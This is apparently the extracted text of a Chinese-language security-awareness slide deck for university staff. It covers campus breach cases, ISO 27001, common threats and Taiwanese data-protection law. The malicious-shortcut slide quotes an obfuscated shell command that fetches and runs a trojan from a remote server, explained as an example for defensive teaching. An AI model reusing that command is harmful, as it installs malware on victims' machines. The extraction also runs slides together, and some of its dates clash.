華梵大學

資訊平安認知與資安法令介紹

(教職員)

威播科技2021/01/19陳治豪副總經理教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令大綱教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令教育體系資訊平安事件案例教育體系單位新聞日期新聞標題新聞來源新聞網址某大學講師98.09.16假冒恩師發出求救e-mail大學講師匯款被騙中廣新聞網/bcc/society/200909/20090916567932.html玄奘大學98.08.09網po露鳥照大二生辯研究同志蘋果日報/applenews/article/art_id/31848632/IssueID/20090809大學考試入學分發委員會98.08.09同學冒填志願資優生落榜自由時報.tw/2009/new/aug/9/today-life1.htm98.08.09《大學分發會亡羊補牢》資安不足擬改採自然人憑證自由時報.tw/2009/new/aug/9/today-life1-2.htm98.08.09冒填志願者明送辦可處刑三年以下聯合報/2009/8/9/NEWS/NATIONAL/NAT4/5066396.shtml98.08.08明星高中同學交惡冒填志願害他落榜聯合報/mag/campus/storypage.jsp?f_MAIN_ID=12&f_SUB_ID=31&f_ART_ID=207257亞洲大學98.07.17女大學生當駭客改情敵選課自由時報.tw/2009/new/jul/17/today-so12.htm義守大學98.07.17好玩幫同學退選課惡作劇生被起訴TVBS.tw/news/news_list.asp?no=aj100920090716131732國科會98.06.27國科會網站洩1.8萬個資身分證字號學號全都露「離譜」蘋果日報/applenews/article/art_id/31742117/IssueID/20090627臺中縣教育處98.06.01臺灣多所學校師生個資外洩百度查得到資安人.tw/article/article_detail.aspx?aid=498198.05.30數百教師個資百度看光光聯合報/mag/campus/storypage.jsp?f_ART_ID=196607臺中高農98.05.06火燒拍打電擊?高職生虐鳥PO網聯合報/taichungnews/2920138某高中98.05.04分享畢旅全裸照慘遭破解永流傳自由時報.tw/2009/new/may/4/today-so9.htm教育體系資訊平安事件案例教育體系單位新聞日期新聞標題新聞來源新聞網址臺東縣興隆國小98.04.05色情入侵教育網站興隆國小無計可施資安之眼http://www.itis.tw/node/2674某科技大學女學生98.04.03轉貼猥褻文章女大生罰萬元聯合報/jw!_otax4eFBQTAWONNaXAPzA--/article?mid=1319&prev=-1&next=1314彰化縣國中小校長98.03.214校長涉賣10萬學生個資自由時報.tw/2009/new/mar/21/today-fo2.htm98.03.21何必找校長?學生個資2元買得到自由時報.tw/2009/new/mar/21/today-fo2-2.htm某大學博士生98.01.13PO性愛影片博士生害博士女友聯合報/index.php/viewnews-15866.html教育體系資訊平安事件案例教育體系單位新聞日期新聞標題新聞來源新聞網址稻江科技學院、政大97.11.23學生個資外洩稻江、政大急撤網頁自由時報.tw/2008/new/nov/23/today-life9.htm彰化縣政府教育處97.11.19彰化縣府網站洩原民學生個資自由時報.tw/2008/new/nov/19/today-complain2.htm中興大學97.10.24男友的前女友惡搞我選課

中興大學學姊報復學妹上網刪除選課資料觸五年罪刑學妹不提告「算了吧」聯合報.tw/FocusDetail.asp?id=1412國中基測、高雄縣市及臺北縣等多所國中校務系統與網站97.06.26基測個資外洩案》竄改3推甄生成績交換個資聯合報/2008/6/26/NEWS/SOCIETY/SOC1/4400762.shtml97.06.2617歲駭客竊80餘所國中個資中時電子報/ajwin/198978697.06.25國中基測考生資料外洩案高中生駭客涉案中央社/b5/8/6/25/n2168156.htm97.06.25遭駭客入侵高市教育局加強網路機密維護中央社/b5/8/6/25/n2168264p.htm97.06.18基測個資外洩教育部：制度面確實需檢討中廣新聞網/bcc/garden/200806/20080618055484.html97.06.18保障國中基測個資呂木琳:資安認證盡量做中央社/2007Cti/2007Cti-News/2007Cti-News-Content/0,4521,130503+132008061801141,00.html97.06.17國中基測資料外洩31萬考生遭販售資安人.tw/article/article_detail.aspx?aid=446797.06.14基測考生個資傳外洩教部調查臺灣時報.tw/html/modules/news/article.php?storyid=1035497.06.1331萬基測考生個資驚傳外洩NOWnews/2008/06/13/545-2289164.htm2021-11-23自由時報學生個資外洩稻江、政大急撤網頁〔記者林曉雲／臺北報導〕又傳出學生個資被學校外洩的個案！教育部大專院校弱勢學生助學計畫審查結果出爐，各大專院校陸續通知學生審查結果，卻發生稻江科技暨管理學院及國立政治大學將學生身分證字號、家庭年收入審核資料公布於校內網站供點閱，引發疑慮。稻江管理學院學務長林連禎表示，教育部審查結果出來後，為迅速且方便申請同學知悉，學校才會直接把審查結果公布在校內網頁上，不慎公布個人資料是無心之過。稻江共有五十一位同學通過審查獲得補助。政治大學學務處則表示，今年度的獎助學金辦法有修正，為確保學生收到訊息，且讓未通過審查的學生可儘早提出申訴，才會在網路上公告身分證字號及審核結果。稻江管理學院受到質疑之後，廿日緊急撤掉網頁上的公告，改以電話個別通知落選學生，並在網頁上公告審核結束的通知，讓申請學生自行查詢；政大也在廿日撤掉網頁的文件連結，另採適當方式公告。不過，政大學生會會長羅羿表示，學校本來就該公告結果，假設個別通知，恐有黑箱作業的疑慮，學校僅公告身分證號碼，未公告學生姓名及系級，可以保護家境清寒的學生免於曝光，技術上來說，還算平安。教育部高教司副司長楊玉惠表示，學生個人隱私不應該被公布在網路上，學生的身分證號碼可能會被有心人士作不當使用，要告知審查結果，還有更他平安而隱密的方法，學校把審查結果公布在網路上是一種偷懶的方式，並不妥當。教育部高教司科長蔡忠益說，以教育部的立場，無權要求學校制定一套制式的公告文件程序。今年度教育部的弱勢學生助學計畫更改做法，採級距式補助，補助級距分為五級，補助金額為五千到三萬五千元，以減輕弱勢學生籌措學費的負擔。臺灣大學一向以電子郵件通知申請獎助學金的學生，不會在網頁上公告相關資料，並另設一套線上服務系統，提供申請學生登記及查詢。學生個資外洩稻江、政大急撤網頁8教育體系資安事件歸納技術面制度面認知面資源不足人力經費網頁遭竄改資料庫被入侵系統登入機制被破解系統或網路服務中斷垃圾郵件資料外洩個資外洩未建立資安管理制度資安管理制度未落實強化系統平安落實之管理制度執行易於操作與增進資安意識認知教育訓練教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令資訊平安，必須注意……………機密性(Confidentiality)確保只有被授權的人可以存取完整性(Integrity)確保資訊及處理方法的正確及完整可用性(Availability)確保被授權的人有需要時可以存取機密性完整性可用性AllRightsReservedbyNIIEPA何謂ISMS何謂ISO

27001ISO27001認證全球推廣狀況Asof2021/12

英國-405義大利-58日本–3378印度-483臺灣-344德國-134韓國-105美國-95香港-31中國-250澳洲-29匈牙利-66新加坡-12捷克-84ISO27001認證全球推廣狀況Japan

3378India

483UK

405Taiwan

344China

250Germany

134USA95Korea

105CzechRepublic84Hungary66RelativeTotal6037Asof2021/12Top10資訊使用之『環境』資訊使用之『技術』資訊使用之『規定』資訊使用『人員』資訊平安範圍環境技術規定人員11個領域、39個控制目標、133個控制要點法令規章遵循業務持續管理資安事件實體安全通訊管理系統維護存取控制資訊資產管理資訊安全組織資訊安全政策資訊安全稽

核人員安全ISO

27001實施效益ISO

27001趨勢20行政院國家資通平安會報

資通平安責任分級作業名稱等級防護縱深ISMS推動稽核方式資安教育訓練(一般主管、資訊人員、資安人員、一般使用者)專業證照檢測機關網站安全弱點A級NSOC直接防護/SOC自建或委外、IDS、防火牆、防毒、郵件過濾裝置通過第三者驗証每年至少2次內稽每年至少(3、6、18、3小時)資訊人員、資安人員需通過資安職能鑑定維持至少2張資安專業證照每年2次B級SOC(選項)、IDS、防火牆、防毒、郵件過濾裝置通過第三者驗証每年至少1次內稽每年至少(3、6、16、3小時)資訊人員、資安人員需通過資安職能鑑定維持至少1張資安專業證照每年1次C級防火牆、防毒、郵件過濾裝置自行成立推動小組規劃作業自我檢視每年至少(2、6、12、3小時)資安專業訓練每年1次D級防火牆、防毒、郵件過濾裝置推動ISMS觀念宣導自我檢視每年至少(1、4、8、2小時)資安專業訓練每年1次教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資安實例討論資訊平安法令USB病毒您可能不曉得…您的電腦病毒是您自己帶回家的！在隨身碟寫入自動執行電腦病毒密碼平安您可能不曉得…您的懶人密碼讓駭客輕易破解您的密碼！使用暴力破解軟體破解網路相簿密碼無線網路威脅您可能不曉得…您輕忽無線網路平安所造成

資安嚴重威脅！無線基地臺遭入侵造成帳號密碼外洩釣魚網頁您可能不曉得…您接到詐騙電話是因為您自己在釣魚網站

洩露了帳號密碼！社交工程攻擊您可能不曉得…您早就淪為社交工程攻擊受害者！惡意程式執行檔駭客如何入侵您的電腦？！主動式的攻擊電子郵件即時通上勾式的攻擊釣魚網站工具軟體嵌入惡意程式誘騙您上當植入木馬程式利用漏洞進行入侵駭客以木馬程式植入他人電腦，再遠端開啟女子電腦上的攝影機…木馬程式所以您要曉得，這些木馬程式威力強大，一旦中招，可能就任由宰割了！被遙控的電腦木馬程式的威脅您不能依賴防毒軟體能幫您阻擋掉所有的木馬程式，因為這些惡意程式可能利用「加殼免殺」技術避過防毒軟體的偵測！木馬程式的技倆所以只要想辦法讓您去執行它…您就被植入木馬程式了！！林志玲MaggieQ露三點寫真三點寫真電子郵件攻擊的陷阱夾帶惡意程式執行檔內文中的惡意網頁超連結Html郵件隱藏遠端下載夾帶惡意程式執行檔常見的惡意程式執行檔類型「捷徑」亦是下載與執行惡意程式的方法.exe.com.bat.pif.scr.lnk小新的自白書.bat預防帳號盜用.lnk「捷徑」攻擊技倆解析捷徑是一串DOS指令的集合此例中，這串指令執行了連接一個伺服器下載惡意程式(木馬程式)執行它！%ComSpec%/cseth=p-&setj=ge&sets=.g03z.&echoechoowww%s%com^>t>b.bat&callb.bat&echoaa33>>t&echobb33>>t&echoecho%j%tpp.vbs^>^>t>>c&echoechobye^>^>t>>c&echoft%h%s:t>>c&echostartp.vbs>>c&rench.bat&callh.bat&內文中的惡意網頁超連結36畫面上顯示的連結網址與真實網址不同…惡意網頁技倆解析Html郵件隱藏遠端下載Html電子郵件可以在Html中撰寫程式語法，所以您只要瀏覽電子郵件，就觸發該程式執行利用IE漏洞，不開啟附檔也會中毒！2004年3月，Beagle.O電腦病毒使用IE漏洞攻擊，使用者在Outlook/OutlookExpress環境下啟用信件預覽功能，信件中的script就會啟動，連結到惡意程式網站下載病毒程式Html郵件遠端下載範例發信端收信端夾帶了一張遠端下載圖片，並將圖片隱藏在這個範例中，遠端下載圖片有被阻擋Html郵件遠端下載範例(續)如果收信端下載了這張圖片，即沒有設定阻擋籍這張圖片下載，發信端獲取了他的電腦環境資料…關閉自動下載圖片以MicrosoftOutlook2007為例關閉自動下載圖片以OutlookExpress為例工具軟體嵌入惡意程式例如將惡意程式執行檔偽裝成一個自解壓縮檔所以您以為您下載了一個某壓縮檔，但其實您一點擊(您以為是解壓縮)，惡意程式就執行與植入了！惡意程式偽裝技倆解析–變更檔案圖示工具軟體嵌入惡意程式將A(您想下載的檔案)、B(惡意程式)兩個檔案合併成一個新檔案，並命名為A執行這個新檔案時，A、B兩個檔案都會執行您會看到A檔案正常執行，但您大概不曉得B檔案也已同時安裝進您的電腦！惡意程式偽裝技倆解析–合併檔案利用漏洞進行入侵網路上有各種利用系統漏洞/軟體漏洞進行攻擊的惡意程式假設您沒有即時更新修補程式，您就可能成為這些惡意程式的受害者利用尚未更新修補程式的漏洞利用漏洞進行入侵利用平安防護缺乏的漏洞教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令國家機密保護法電子簽章法刑法(防駭條款)電腦處理個人資料保護法檔案法著作權法行政院及所屬各機關資通平安管理要點機關公文電子交換作業辦法智慧財產權IntellectualPropertyRights(IPR)資訊平安相關法令妨害電腦使用罪妨害電腦使用罪主要內容妨害電腦使用罪主要內容電腦處理個人資料保護法說明(1)立法目的對公務與非公務機關蒐集、處理、與利用個人資料的情形，加以明文規範防止個人人格權〔隱私權〕遭受侵害，促進個人資料之合理利用，特此制定電腦處理個人資料保護法保護客體本法保護客體限於經電腦處理的個人資料受本法保護之個人資料以現仍生存之自然人為限，已死亡之自然人與法人，不受本法之規範個人資料包含:自然人之姓名、出生年月日、身分證統一編號、特徵、指紋、婚姻、家庭、教育、職業、健康、病歷、財務情況、社交活動、及其他足以識別該個人之資料電腦處理個人資料保護法說明(2)電腦處理個人資料保護法說明(3)機關對個人資料之蒐集或利用的原則應尊重當事人之權益，依誠實及信用方法為之不得逾越特定目的之必要範圍，以確保當事人權益，防止人格權受到侵害揭露個人資料，當事人是主要關鍵人物，當事人本身需審慎決定何者為提供給公務與非公務機關的必要個人資料電腦處理個人資料保護法修訂草案修法背景法務部為因應急速變遷之社會環境，特別彙整國內學界與實務界的相關修法建議，並參考其他國家之個人資料保護相關法令來針對本法進行修訂修訂草案共有55條，並將本法名稱修訂為「個人資料保護法」

草案修正方向擴大保護客體普遍適用主體增修行為規範強化行政監督妥適調整罰則促進民眾參與電腦處理個人資料保護法修訂草案修法重點說明將買賣個人資料行為從告訴乃論罪修改為公訴罪，並提高刑責，最高為五年有期徒刑寄廣告信、垃圾郵件將觸法，未經個人同意，網路公司或個體戶大舉販賣蒐集的大筆電子郵件信箱供寄發垃圾郵件等行為，均將觸犯本法，檢警接獲檢舉後必須主動追查假設是公務員涉案，依法得加重其刑二分之一，最重可處七年半徒刑，與刑責已接近涉及貪瀆案重罰意圖營利而違法的行為，修訂草案大幅加重「意圖營利而違法